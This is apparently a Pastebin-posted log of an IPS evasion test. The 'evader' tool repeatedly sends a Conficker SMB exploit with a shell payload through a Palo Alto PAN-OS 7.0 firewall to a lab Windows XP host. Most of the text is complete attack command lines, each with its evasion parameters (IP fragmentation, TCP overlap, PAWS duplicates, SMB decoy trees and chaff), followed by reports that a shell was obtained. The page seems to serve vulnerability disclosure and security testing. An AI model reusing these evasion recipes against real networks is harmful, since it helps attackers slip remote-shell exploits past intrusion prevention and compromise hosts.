API tools faq
paste
Advertisement
netsecvulns

Palo Alto Networks PAN-OS7.0 evader log file

netsecvulns
Jun 8th, 2015
1,503
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 468.82 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. SECURITY BREACHES: 423 | DURATION: 43229 SEC
  4.  
  5.  
  6. Info: Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
  7. 2015-06-07 23:19:27 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
  8. 2015-06-07 23:19:27 INFO Victim check disabled - will NOT notice if victim is no longer running
  9. 2015-06-07 23:19:29 INFO Using rand seed Wcn7q/xCpWQ=
  10. 2015-06-07 23:19:29 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
  11. 2015-06-07 23:19:29 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
  12. Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
  13. ..
  14. 2 runs averaging 1.63 runs / second ; progress: 1/43200...................2015-06-07 23:19:33 INFO
  15. Success. (10.62.90.111):
  16. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62021 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=P2RHsq/Wcjc --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"24" --evasion=[msrpc_req,end]tcp_paws,"1","268435453","random_alpha" --verifydelay=1000 --payload=shell
  17. Info: Using random seed P2RHsq/Wcjc
  18. The following evasions are applied from stage msrpc_bind to msrpc_req:
  19. - IPv4 fragments with at most 24 bytes per fragment
  20. The following evasions are applied from stage msrpc_req to end:
  21. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alpha bytes as payload
  22.  
  23. Info: NetBIOS connection 10.62.90.111:62021 -> 10.35.1.207:445
  24. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  25. Info: Sending MSRPC request with exploit
  26. Info: Shell found, attack succeeded
  27. Info: Command shell connection reset.
  28. Info: CommandShell::SendCommand() - Failed to send string
  29. Info: Shell closed
  30. 0: Success.
  31. ...............2015-06-07 23:19:36 INFO
  32. Success. (10.62.90.117):
  33. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51525 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ElGy0J/TZpw --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1479","new","zero" --verifydelay=1000 --payload=shell
  34. Info: Using random seed ElGy0J/TZpw
  35. The following evasions are applied from stage smb_opentree to msrpc_req:
  36. - Before normal SMB writes, 7 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  37. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  38. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  39.  
  40. Info: NetBIOS connection 10.62.90.117:51525 -> 10.35.1.207:445
  41. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  42. Info: Sending MSRPC request with exploit
  43. Info: Shell found, attack succeeded
  44. Info: Shell closed
  45. 0: Success.
  46. ..
  47. 40 runs averaging 6.31 runs / second ; progress: 6/43200..............................
  48. 70 runs averaging 6.13 runs / second ; progress: 11/43200.........................
  49. 95 runs averaging 5.76 runs / second ; progress: 16/43200.........................
  50. 120 runs averaging 5.57 runs / second ; progress: 22/43200.....2015-06-07 23:19:52 INFO
  51. Success. (10.62.90.118):
  52. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13515 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IR1Yko0dPgg --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"3","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,end]tcp_paws,"1","117616708","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  53. Info: Using random seed IR1Yko0dPgg
  54. The following evasions are applied from stage smb_connect to smb_opentree:
  55. - TCP timestamps echo reply value is sent in the wrong endianness
  56. The following evasions are applied from stage smb_opentree to end:
  57. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117616708> and has random alpha bytes as payload
  58. The following evasions are applied from stage smb_opentree to smb_openpipe:
  59. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  60.  
  61. Info: NetBIOS connection 10.62.90.118:13515 -> 10.35.1.207:445
  62. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  63. Info: Sending MSRPC request with exploit
  64. Info: Shell found, attack succeeded
  65. Info: Shell closed
  66. 0: Success.
  67. .............2015-06-07 23:19:54 INFO
  68. Success. (10.62.90.110):
  69. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58996 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=dJz7n8sKZ9A --evasion=[smb_opentree,end]tcp_chaff,"75%","nullchksum|nullflag|outofwindow","random" --evasion=[smb_connect,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","alphanumrandomized" --verifydelay=1000 --payload=shell
  70. Info: Using random seed dJz7n8sKZ9B
  71. The following evasions are applied from stage netbios_connect to msrpc_req:
  72. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
  73. The following evasions are applied from stage smb_connect to end:
  74. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  75. The following evasions are applied from stage smb_opentree to end:
  76. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  77. * NULL TCP checksum.
  78. * NULL TCP control flags.
  79. * An out-of-window sequence number.
  80. * Duplicate packet has random bytes as payload
  81.  
  82. Info: NetBIOS connection 10.62.90.110:58996 -> 10.35.1.207:445
  83. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  84. Info: Sending MSRPC request with exploit
  85. Info: Shell found, attack succeeded
  86. Info: CommandShell::SendCommand() - Failed to send string
  87. Info: Command shell connection reset.
  88. Info: Shell closed
  89. 0: Success.
  90. ........2015-06-07 23:19:55 INFO
  91. Success. (10.62.90.110):
  92. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53735 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Q1Ry+56Ny4g --evasion=[smb_opentree,end]smb_decoytrees,"5","6","7","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"3","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"75%","nullchksum|nullflag|outofwindow|shorthdr","shuffle" --verifydelay=1000 --payload=shell
  93. Info: Using random seed Q1Ry+56Ny4h
  94. The following evasions are applied from stage smb_connect to msrpc_bind:
  95. - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  96. The following evasions are applied from stage smb_opentree to msrpc_bind:
  97. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  98. * NULL TCP checksum.
  99. * NULL TCP control flags.
  100. * An out-of-window sequence number.
  101. * TCP header shorter than 20 bytes
  102. * Duplicate packet has shuffled original payload
  103. The following evasions are applied from stage smb_opentree to end:
  104. - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  105.  
  106. Info: NetBIOS connection 10.62.90.110:53735 -> 10.35.1.207:445
  107. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  108. Info: Sending MSRPC request with exploit
  109. Info: Shell found, attack succeeded
  110. Info: CommandShell::SendCommand() - Failed to send string
  111. Info: Command shell connection reset.
  112. Info: Shell closed
  113. 0: Success.
  114. ......
  115. 155 runs averaging 5.83 runs / second ; progress: 27/43200.................2015-06-07 23:19:59 INFO
  116. Success. (10.62.90.114):
  117. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24638 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Ufs+GHrFFUA --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"32" --evasion=[smb_opentree,msrpc_req]ipv4_order,"firstlast" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","5","random_alpha" --verifydelay=1000 --payload=shell
  118. Info: Using random seed Ufs+GHrFFUB
  119. The following evasions are applied from stage netbios_connect to msrpc_bind:
  120. - IPv4 fragments with at most 32 bytes per fragment
  121. The following evasions are applied from stage smb_connect to msrpc_req:
  122. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
  123. The following evasions are applied from stage smb_opentree to msrpc_req:
  124. - IPv4 fragments are sent in correct order except that the first fragment comes last
  125.  
  126. Info: NetBIOS connection 10.62.90.114:24638 -> 10.35.1.207:445
  127. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  128. Info: Sending MSRPC request with exploit
  129. Info: Shell found, attack succeeded
  130. Info: Shell closed
  131. 0: Success.
  132. ...2015-06-07 23:20:00 INFO
  133. Success. (10.62.90.113):
  134. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13965 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UB07gamyjBM --evasion=[smb_connect,end]tcp_paws,"50%","215801129","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","190724998","random" --verifydelay=1000 --payload=shell
  135. Info: Using random seed UB07gamyjBN
  136. The following evasions are applied from stage smb_connect to end:
  137. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215801129> and has original payload with alphanumeric bytes randomized
  138. The following evasions are applied from stage smb_opentree to smb_openpipe:
  139. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190724998> and has random bytes as payload
  140.  
  141. Info: NetBIOS connection 10.62.90.113:13965 -> 10.35.1.207:445
  142. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  143. Info: Sending MSRPC request with exploit
  144. Info: Shell found, attack succeeded
  145. Info: Command shell connection reset.
  146. Info: CommandShell::SendCommand() - Failed to send string
  147. Info: Shell closed
  148. 0: Success.
  149. ........
  150. 185 runs averaging 5.83 runs / second ; progress: 32/43200...2015-06-07 23:20:03 INFO
  151. Success. (10.62.90.117):
  152. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26112 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=MkfDE4ODgEw --evasion=[msrpc_req,end]smb_chaff,"2","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
  153. Info: Using random seed MkfDE4ODgEw
  154. The following evasions are applied from stage smb_opentree to msrpc_req:
  155. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
  156. The following evasions are applied from stage msrpc_req to end:
  157. - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  158.  
  159. Info: NetBIOS connection 10.62.90.117:26112 -> 10.35.1.207:445
  160. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  161. Info: Sending MSRPC request with exploit
  162. Info: Shell found, attack succeeded
  163. Info: Command shell connection reset.
  164. Info: CommandShell::SendCommand() - Failed to send string
  165. Info: Shell closed
  166. 0: Success.
  167. ..................
  168. 207 runs averaging 5.63 runs / second ; progress: 37/43200...............
  169. 222 runs averaging 5.31 runs / second ; progress: 42/43200...........
  170. 233 runs averaging 4.98 runs / second ; progress: 47/43200............
  171. 245 runs averaging 4.73 runs / second ; progress: 52/43200.............
  172. 258 runs averaging 4.54 runs / second ; progress: 57/43200..............
  173. 272 runs averaging 4.39 runs / second ; progress: 62/43200................
  174. 288 runs averaging 4.30 runs / second ; progress: 67/43200.....................
  175. 309 runs averaging 4.30 runs / second ; progress: 72/43200..............
  176. 323 runs averaging 4.20 runs / second ; progress: 77/43200.....
  177. 328 runs averaging 4.00 runs / second ; progress: 82/43200......
  178. 334 runs averaging 3.84 runs / second ; progress: 87/43200.......2015-06-07 23:21:01 INFO
  179. Success. (10.62.90.112):
  180. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21232 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=AjLLEsF6RyU --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"349","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"21","chksum|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
  181. Info: Using random seed AjLLEsF6RyU
  182. The following evasions are applied from stage smb_opentree to msrpc_req:
  183. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  184. * Invalid TCP checksum.
  185. * TCP header shorter than 20 bytes
  186. * Duplicate packet has original payload with alphanumeric bytes randomized
  187. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
  188. The following evasions are applied from stage smb_openpipe to msrpc_req:
  189. - 349 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  190.  
  191. Info: NetBIOS connection 10.62.90.112:21232 -> 10.35.1.207:445
  192. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  193. Info: Sending MSRPC request with exploit
  194. Info: Shell found, attack succeeded
  195. Info: CommandShell::SendCommand() - Failed to send string
  196. Info: Command shell connection reset.
  197. Info: Shell closed
  198. 0: Success.
  199. ...
  200. 345 runs averaging 3.75 runs / second ; progress: 92/43200................
  201. 361 runs averaging 3.72 runs / second ; progress: 97/43200......2015-06-07 23:21:09 INFO
  202. Success. (10.62.90.118):
  203. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22183 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=gueqfnfgtKk --evasion=tcp_nocwnd --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
  204. Info: Using random seed gueqfnfgtKm
  205. - TCP congestion window is not used.
  206. The following evasions are applied from stage smb_openpipe to end:
  207. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
  208.  
  209. Info: NetBIOS connection 10.62.90.118:22183 -> 10.35.1.207:445
  210. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  211. Info: Sending MSRPC request with exploit
  212. Info: Shell found, attack succeeded
  213. Info: Shell closed
  214. 0: Success.
  215. ...........
  216. 379 runs averaging 3.71 runs / second ; progress: 102/43200.........
  217. 388 runs averaging 3.62 runs / second ; progress: 107/43200......
  218. 394 runs averaging 3.51 runs / second ; progress: 112/43200.......2015-06-07 23:21:27 INFO
  219. Success. (10.62.90.118):
  220. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10588 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=WTkrkazPR60 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","111364770","alphanumrandomized" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
  221. Info: Using random seed WTkrkazPR61
  222. The following evasions are applied from stage netbios_connect to end:
  223. - TCP receive window is set to at most 1048575 bytes.
  224. The following evasions are applied from stage smb_opentree to msrpc_req:
  225. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 111364770> and has original payload with alphanumeric bytes randomized
  226.  
  227. Info: NetBIOS connection 10.62.90.118:10588 -> 10.35.1.207:445
  228. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  229. Info: Sending MSRPC request with exploit
  230. Info: Shell found, attack succeeded
  231. Info: CommandShell::SendCommand() - Failed to send string
  232. Info: Command shell connection reset.
  233. Info: Shell closed
  234. 0: Success.
  235. .
  236. 403 runs averaging 3.44 runs / second ; progress: 117/43200...............
  237. 418 runs averaging 3.42 runs / second ; progress: 122/43200.........2015-06-07 23:21:36 INFO
  238. Success. (10.62.90.112):
  239. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43982 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=00v8sOxbBJs --evasion=[smb_opentree,msrpc_req]ipv4_frag,"16" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","7","random_msrpcbind" --verifydelay=1000 --payload=shell
  240. Info: Using random seed 00v8sOxbBJv
  241. The following evasions are applied from stage smb_opentree to msrpc_req:
  242. - IPv4 fragments with at most 16 bytes per fragment
  243. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  244.  
  245. Info: NetBIOS connection 10.62.90.112:43982 -> 10.35.1.207:445
  246. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  247. Info: Sending MSRPC request with exploit
  248. Info: Shell found, attack succeeded
  249. Info: Shell closed
  250. 0: Success.
  251. ...
  252. 431 runs averaging 3.38 runs / second ; progress: 127/43200...........
  253. 442 runs averaging 3.34 runs / second ; progress: 132/43200...........
  254. 453 runs averaging 3.30 runs / second ; progress: 137/43200.......
  255. 460 runs averaging 3.23 runs / second ; progress: 142/43200........
  256. 468 runs averaging 3.17 runs / second ; progress: 147/43200..
  257. 470 runs averaging 3.08 runs / second ; progress: 152/43200.....
  258. 475 runs averaging 3.02 runs / second ; progress: 157/43200..2015-06-07 23:22:09 INFO
  259. Success. (10.62.90.117):
  260. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FcbWMtZoa2Y --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"439","random" --evasion=[smb_openpipe,end]tcp_paws,"25%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
  261. Info: Using random seed FcbWMtZoa2Y
  262. The following evasions are applied from stage smb_connect to smb_opentree:
  263. - 439 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  264. The following evasions are applied from stage smb_openpipe to end:
  265. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
  266.  
  267. Info: NetBIOS connection 10.62.90.117:19364 -> 10.35.1.207:445
  268. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  269. Info: Sending MSRPC request with exploit
  270. Info: Shell found, attack succeeded
  271. Info: CommandShell::SendCommand() - Failed to send string
  272. Info: Command shell connection reset.
  273. Info: Shell closed
  274. 0: Success.
  275. .
  276. 479 runs averaging 2.95 runs / second ; progress: 162/43200...
  277. 482 runs averaging 2.88 runs / second ; progress: 167/43200
  278. 482 runs averaging 2.79 runs / second ; progress: 172/43200............
  279. 494 runs averaging 2.78 runs / second ; progress: 177/43200.....................
  280. 515 runs averaging 2.82 runs / second ; progress: 182/43200.........
  281. 524 runs averaging 2.79 runs / second ; progress: 188/43200.....
  282. 529 runs averaging 2.75 runs / second ; progress: 193/43200
  283. 529 runs averaging 2.68 runs / second ; progress: 198/43200.......2015-06-07 23:22:50 INFO
  284. Success. (10.62.90.117):
  285. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61516 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=s09eyA+Hq5o --evasion=[smb_opentree,end]tcp_paws,"13","8","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"1","9","zero" --verifydelay=1000 --payload=shell
  286. Info: Using random seed s09eyA+Hq5q
  287. The following evasions are applied from stage smb_opentree to end:
  288. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
  289. The following evasions are applied from stage smb_openpipe to end:
  290. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
  291.  
  292. Info: NetBIOS connection 10.62.90.117:61516 -> 10.35.1.207:445
  293. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  294. Info: Sending MSRPC request with exploit
  295. Info: Shell found, attack succeeded
  296. Info: Shell closed
  297. 0: Success.
  298. ......
  299. 543 runs averaging 2.68 runs / second ; progress: 203/43200..2015-06-07 23:22:53 INFO
  300. Success. (10.62.90.113):
  301. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32101 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=7vh9Q4gm0XQ --evasion=[smb_connect,end]ipv4_opt,"8","inc","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","14791099","zero" --verifydelay=1000 --payload=shell
  302. Info: Using random seed 7vh9Q4gm0XT
  303. The following evasions are applied from stage smb_connect to end:
  304. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  305. The duplicate packet has identical payload except that alphanumeric characters are randomized
  306. The following evasions are applied from stage smb_openpipe to msrpc_req:
  307. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14791099> and has 0x00 bytes as payload
  308.  
  309. Info: NetBIOS connection 10.62.90.113:32101 -> 10.35.1.207:445
  310. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  311. Info: Sending MSRPC request with exploit
  312. Info: Shell found, attack succeeded
  313. Info: Shell closed
  314. 0: Success.
  315. ............
  316. 558 runs averaging 2.69 runs / second ; progress: 208/43200.......
  317. 565 runs averaging 2.66 runs / second ; progress: 213/43200......
  318. 571 runs averaging 2.62 runs / second ; progress: 218/43200....
  319. 575 runs averaging 2.58 runs / second ; progress: 223/43200.......2015-06-07 23:23:16 INFO
  320. Success. (10.62.90.113):
  321. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29396 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=lVpgbd+BmFc --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","zero" --evasion=[smb_connect,end]tcp_paws,"1","268435455","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"269717" --verifydelay=1000 --payload=shell
  322. Info: Using random seed lVpgbd+BmFe
  323. The following evasions are applied from stage netbios_connect to end:
  324. - TCP receive window is set to at most 269717 bytes.
  325. The following evasions are applied from stage smb_connect to msrpc_req:
  326. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  327. The duplicate packet has NULL bytes for payload
  328. The following evasions are applied from stage smb_connect to end:
  329. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  330.  
  331. Info: NetBIOS connection 10.62.90.113:29396 -> 10.35.1.207:445
  332. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  333. Info: Sending MSRPC request with exploit
  334. Info: Shell found, attack succeeded
  335. Info: Shell closed
  336. 0: Success.
  337. ......
  338. 589 runs averaging 2.59 runs / second ; progress: 228/43200...................
  339. 608 runs averaging 2.61 runs / second ; progress: 233/43200.....
  340. 613 runs averaging 2.58 runs / second ; progress: 238/43200...
  341. 616 runs averaging 2.54 runs / second ; progress: 243/43200..
  342. 618 runs averaging 2.49 runs / second ; progress: 248/43200..........
  343. 628 runs averaging 2.48 runs / second ; progress: 253/43200.......
  344. 635 runs averaging 2.46 runs / second ; progress: 258/432002015-06-07 23:23:48 INFO
  345. Success. (10.62.90.118):
  346. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34169 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Deh5nhWGiuo --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"2","1","2047","random" --evasion=[netbios_connect,end]tcp_paws,"1","46504624","random_alphanum" --evasion=[netbios_connect,end]tcp_segvar,"3","20067" --verifydelay=1000 --payload=shell
  347. Info: Using random seed Deh5nhWGiuo
  348. The following evasions are applied from stage netbios_connect to end:
  349. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 46504624> and has random alphanumeric bytes as payload
  350. - TCP packets are segmented to contain between 3 and 20067 bytes of payload.
  351. The following evasions are applied from stage smb_opentree to msrpc_bind:
  352. - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2047 random bytes.
  353.  
  354. Info: NetBIOS connection 10.62.90.118:34169 -> 10.35.1.207:445
  355. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  356. Info: Sending MSRPC request with exploit
  357. Info: Shell found, attack succeeded
  358. Info: Shell closed
  359. 0: Success.
  360. 2015-06-07 23:23:50 INFO
  361. Success. (10.62.90.118):
  362. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49654 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=AgruJf0YDvE --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"1112" --evasion=[smb_connect,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
  363. Info: Using random seed AgruJf0YDvE
  364. The following evasions are applied from stage netbios_connect to msrpc_bind:
  365. - IPv4 fragments with at most 1112 bytes per fragment
  366. The following evasions are applied from stage smb_connect to msrpc_req:
  367. - IPv4 fragments with at most 24 bytes per fragment
  368. The following evasions are applied from stage smb_openpipe to end:
  369. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
  370.  
  371. Info: NetBIOS connection 10.62.90.118:49654 -> 10.35.1.207:445
  372. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  373. Info: Sending MSRPC request with exploit
  374. Info: Shell found, attack succeeded
  375. Info: Shell closed
  376. 0: Success.
  377. ..
  378. 639 runs averaging 2.43 runs / second ; progress: 263/43200..........
  379. 649 runs averaging 2.42 runs / second ; progress: 268/43200....
  380. 653 runs averaging 2.39 runs / second ; progress: 273/43200......
  381. 659 runs averaging 2.37 runs / second ; progress: 278/43200......
  382. 665 runs averaging 2.35 runs / second ; progress: 283/43200....
  383. 669 runs averaging 2.32 runs / second ; progress: 288/43200....
  384. 673 runs averaging 2.30 runs / second ; progress: 293/43200.......
  385. 680 runs averaging 2.28 runs / second ; progress: 298/43200.........Pid 27321 timed out - killed
  386. 2015-06-07 23:24:31 INFO
  387. Timed out (10.62.90.119):
